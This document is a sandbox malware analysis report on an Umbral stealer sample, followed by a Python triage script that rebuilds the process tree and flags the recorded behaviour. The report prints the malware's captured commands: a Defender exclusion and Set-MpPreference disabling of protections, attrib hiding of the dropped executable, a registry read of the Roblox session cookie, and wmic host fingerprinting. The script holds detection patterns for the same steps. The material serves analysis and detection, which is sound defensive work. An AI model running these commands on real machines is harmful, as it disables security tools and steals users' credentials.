Malware Analysis Report

2024-11-15 04:40

Sample ID 231105-dt8tqscb99
Target ConsoleApplication1.obf.exe
SHA256 52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae
Tags
umbral spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae

Threat Level: Known bad

The file ConsoleApplication1.obf.exe was found to be: Known bad.

Malicious Activity Summary

umbral spyware stealer

Detect Umbral payload

Umbral family

Umbral

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

Looks up external IP address via web service

Drops file in System32 directory

Unsigned PE

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-05 03:19

Signatures

Detect Umbral payload

Umbral family

umbral

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-05 03:19

Reported

2023-11-05 03:19

Platform

win10v2004-20231023-en

Max time kernel

7s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"

Signatures

Detect Umbral payload

Umbral

stealer umbral

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe N/A
File created C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe N/A
File opened for modification C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\SYSTEM32\attrib.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2584 wrote to memory of 2668 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
PID 2584 wrote to memory of 1232 (2 events) N/A C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
PID 1232 wrote to memory of 836 (2 events) N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\SYSTEM32\attrib.exe
PID 1232 wrote to memory of 2328 (2 events) N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 4192 (2 events) N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 2840 (2 events) N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe

"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"

C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe

C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe

C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe

C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

Note: the command line is reproduced exactly as captured. The powershell.exe under the v1.0 directory on this platform is Windows PowerShell 5.1, which does not accept "&&" as a statement separator (that operator arrived in PowerShell 7), so the whole line fails to parse and neither Set-MpPreference call takes effect. The Add-MpPreference exclusion in the preceding process is not affected by this and does succeed when run with administrative rights.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

Note: the command line is reproduced exactly as captured. "HKLN:" is not a registered PowerShell drive (the HKEY_LOCAL_MACHINE drive is "HKLM:"), so this second lookup fails; only the HKCU query above can return a .ROBLOSECURITY session cookie.

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
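The process chain above, worked as an added triage example (not part of the sandbox report): the script rebuilds the process tree from process-creation events and checks each node against rules for the behaviours this report records, namely Defender tampering through Add-/Set-MpPreference, attrib +h +s on the dropped executable, a Temp-resident dropper launching binaries it placed under System32, the .ROBLOSECURITY registry read, and wmic/registry host fingerprinting. The events are constructed from the command lines in the Processes section and the PIDs in the WriteProcessMemory table; PIDs 9001 to 9004, the rule names and the event layout are assumptions of the example, not data from the report.

```python
"""Rebuild a process tree from process-creation events and flag the
defence-evasion and stealer behaviour recorded in this Umbral report."""
import re

# Constructed events modelled on the Processes and WriteProcessMemory sections.
# Tuple layout: (pid, parent pid, image path, command line). PIDs 2584, 2668,
# 1232, 836, 2328, 4192 and 2840 come from the report; 9001-9004 are assumed
# because the report gives no PIDs for the wmic and final powershell children.
SPEECH = "C:\\Windows\\System32\\Speech"
PAYLOAD = SPEECH + "\\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe"
HELPER = SPEECH + "\\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe"
DROPPER = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ConsoleApplication1.obf.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
WMIC = "C:\\Windows\\System32\\Wbem\\wmic.exe"

EVENTS = [
    (2584, None, DROPPER, f'"{DROPPER}"'),
    (2668, 2584, HELPER, HELPER),
    (1232, 2584, PAYLOAD, PAYLOAD),
    (836, 1232, "C:\\Windows\\SYSTEM32\\attrib.exe", f'"attrib.exe" +h +s "{PAYLOAD}"'),
    (2328, 1232, PS, f"\"powershell.exe\" Add-MpPreference -ExclusionPath '{PAYLOAD}'"),
    (4192, 1232, PS, '"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
                     '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true '
                     '-DisableScriptScanning $true -MAPSReporting Disabled -SubmitSamplesConsent NeverSend'),
    (2840, 1232, PS, '"powershell.exe" Get-ItemPropertyValue -Path '
                     'HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY'),
    (9001, 1232, WMIC, '"wmic.exe" os get Caption'),
    (9002, 1232, WMIC, '"wmic.exe" computersystem get totalphysicalmemory'),
    (9003, 1232, WMIC, '"wmic.exe" csproduct get uuid'),
    (9004, 1232, PS, '"powershell.exe" Get-ItemPropertyValue -Path '
                     "'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' "
                     '-Name PROCESSOR_IDENTIFIER'),
]


def tokens(cmd):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def defender_tamper(image, cmd, parent):
    # Add-/Set-MpPreference used to add exclusions or switch Defender features off.
    return image.lower().endswith("powershell.exe") and re.search(
        r"\b(Set|Add)-MpPreference\b.*-(Disable\w+|ExclusionPath|MAPSReporting|SubmitSamplesConsent)",
        cmd, re.I) is not None


def hide_executable(image, cmd, parent):
    # attrib +h +s on an .exe: hidden + system attributes to dodge casual inspection.
    if not image.lower().endswith("attrib.exe"):
        return False
    toks = tokens(cmd)
    flags = {t.lower() for t in toks if t.startswith("+")}
    return {"+h", "+s"} <= flags and toks[-1].lower().endswith(".exe")


def temp_to_system32(image, cmd, parent):
    # A binary running from %TEMP% launching something it placed under System32.
    return (parent is not None
            and "\\appdata\\local\\temp\\" in parent.lower()
            and image.lower().startswith("c:\\windows\\system32\\"))


def roblox_cookie_theft(image, cmd, parent):
    return ".ROBLOSECURITY" in cmd


FINGERPRINT = re.compile(
    r"\b(os get caption|computersystem get totalphysicalmemory|csproduct get uuid)\b"
    r"|PROCESSOR_IDENTIFIER", re.I)


def host_fingerprint(image, cmd, parent):
    return FINGERPRINT.search(cmd) is not None


RULES = [defender_tamper, hide_executable, temp_to_system32, roblox_cookie_theft, host_fingerprint]


def lineage(pid, by_pid):
    """Root-to-leaf PID chain, e.g. '2584 > 1232 > 836'."""
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid][1]
    return " > ".join(str(p) for p in reversed(chain))


def render_tree(events):
    """Indented process tree; roots are processes whose parent is not in the events."""
    by_pid = {e[0]: e for e in events}
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {by_pid[pid][2]}")
        for child in [e[0] for e in events if e[1] == pid]:
            walk(child, depth + 1)

    for e in events:
        if e[1] not in by_pid:
            walk(e[0], 0)
    return "\n".join(lines)


def triage(events):
    """Return one finding per (process, matched rule), each with its lineage."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, ppid, image, cmd in events:
        parent = by_pid[ppid][2] if ppid in by_pid else None
        for rule in RULES:
            if rule(image, cmd, parent):
                findings.append({"pid": pid, "rule": rule.__name__,
                                 "image": image, "lineage": lineage(pid, by_pid)})
    return findings


if __name__ == "__main__":
    print(render_tree(EVENTS))
    for f in triage(EVENTS):
        print(f"{f['lineage']:>20}  {f['rule']:<20} {f['image']}")
```

The Defender rule fires on the attempt, not on its effect: the Set-MpPreference line in this report fails to parse under Windows PowerShell 5.1 because of the "&&", but the Add-MpPreference exclusion succeeds, and either one coming from a child of an unsigned binary in System32\Speech is worth an alert. The lineage string lets an analyst pivot straight from a powershell.exe or attrib.exe hit to the parent that spawned it.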

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
NL 142.250.179.131:443 gstatic.com tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp

Files

C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe

MD5 cebf7458dceffcbb81a290cf045beb27
SHA1 98c74fa610995d61d2ee78a2ea888e003e9f436d
SHA256 97d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660
SHA512 144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91

C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe

MD5 ef2711e9aeeb23297016ef32b46a3c7e
SHA1 ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA256 2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA512 3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f

memory/1232-9-0x000001CAB1DD0000-0x000001CAB1E10000-memory.dmp

memory/1232-10-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/1232-11-0x000001CACC390000-0x000001CACC3A0000-memory.dmp

memory/2328-12-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ys2lioz.dti.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2328-23-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-22-0x0000018BE5A10000-0x0000018BE5A32000-memory.dmp

memory/2328-24-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-25-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-26-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-29-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4192-31-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/4192-41-0x000001CA484F0000-0x000001CA48500000-memory.dmp

memory/4192-42-0x000001CA484F0000-0x000001CA48500000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

memory/4192-44-0x000001CA484F0000-0x000001CA48500000-memory.dmp

memory/1232-45-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/4192-47-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/1232-50-0x000001CACC560000-0x000001CACC5D6000-memory.dmp

memory/1232-51-0x000001CACC4E0000-0x000001CACC530000-memory.dmp

memory/1232-52-0x000001CACC620000-0x000001CACC63E000-memory.dmp

memory/1232-53-0x000001CACC390000-0x000001CACC3A0000-memory.dmp

memory/2840-54-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2840-55-0x000001FE8A010000-0x000001FE8A020000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4d919c0b86abb8726889c70aa684ce6
SHA1 0c3d34a077526faea0c816b083d6b1594839aac8
SHA256 b40885d7d80c8b07f2b227cca9848c856257713d908f303390eb3c5b2ee4241a
SHA512 9af2bab67d210df0e710141123b4dc6e0613e5becdc2e58264d3f81ccad195d4b3f963f6dca71ebda40f26a0d57b9c730183d6b470fac677c8199890417423b9

memory/2840-77-0x000001FE8A010000-0x000001FE8A020000-memory.dmp

memory/2840-80-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2372-90-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2372-91-0x000002226B020000-0x000002226B030000-memory.dmp

memory/2372-92-0x000002226B020000-0x000002226B030000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0a78e60bfb279d18fd3d6e7a67411f5
SHA1 9344fe3654a14bc66afb9dc6ea215fabfbe5c906
SHA256 a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb
SHA512 9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

memory/2372-94-0x000002226B020000-0x000002226B030000-memory.dmp

memory/2372-96-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/1232-98-0x000001CAB3B80000-0x000001CAB3B8A000-memory.dmp

memory/1232-99-0x000001CACC530000-0x000001CACC542000-memory.dmp

memory/2660-102-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2660-104-0x000002B86AA00000-0x000002B86AA10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b3ae619d7b2e604c5cda175980a9e909
SHA1 7fc9e9750d42637f9a663a4e143ccf8666249d02
SHA256 64ea1d41f18f3e3a3bef881901858bd8fed54f52d801521f9a3686073683b500
SHA512 bc72d169b668e759168b08e753591e81bf8fd08a41b7b14522bbc071ebc16548af231ad4a49385df31c690fa456a7b27c1f3554a80acc0a99e877c6717b377e0

memory/2660-103-0x000002B86AA00000-0x000002B86AA10000-memory.dmp

memory/2660-115-0x000002B86AA00000-0x000002B86AA10000-memory.dmp